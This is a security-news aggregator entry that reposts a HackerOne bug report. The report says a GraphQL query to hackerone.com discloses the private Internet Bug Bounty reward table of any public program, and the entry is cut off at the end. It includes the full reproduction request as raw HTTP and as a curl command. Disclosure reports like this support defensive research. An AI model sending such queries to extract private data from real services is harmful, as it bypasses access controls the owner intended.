๐ HackerOne: Being able to disclose IBB bounty table of any public program
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
Summary: Hi there, I hope you are doing well :) According to https://docs.hackerone.com/en/articles/8496298-internet-bug-bounty โโโโโโ It says "You can opt-in by setting up your bounty table on your main programโs rewards settings page (instructions below). This bounty table is private and indicates how much you will award for vulnerabilities discovered in open-source projects" Which means the IBB bounty table is private but i was able to disclose IBB bounty table Steps To Reproduce Send this HTTP request: ```HTTP POST /graphql HTTP/2 Host: hackerone.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: application/json Content-Type: application/json Content-Length: 157 Te: trailers {"query":"{\r\n team(handle: \"security\") {\r\n\r\nibb_bounty_table {\r\n critical\r\n high\r\n medium\r\n low\r\n }\r\n}\r\n}\r\n"} ``` OR run this curl command : ``` curl -i -s -k -X $'POST' \ -H $'Host: hackerone.com' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0' -H $'Accept: application/json' -H $'Content-Type: application/json' -H $'Content-Length: 157' -H $'Te: trailers' \ --data-binary $'{\"query\":\"{\r\n team(handle: \\"security\\") {\r\n\r\nibb_bounty_table {\r\n critical\r\n high\r\n medium\r\n low\r\n }\r\n}\r\n}\r\n\"}' \ $'https://hackerone.com/graphql' ``` it will disclose IBB bounty table of Hackerone:... ...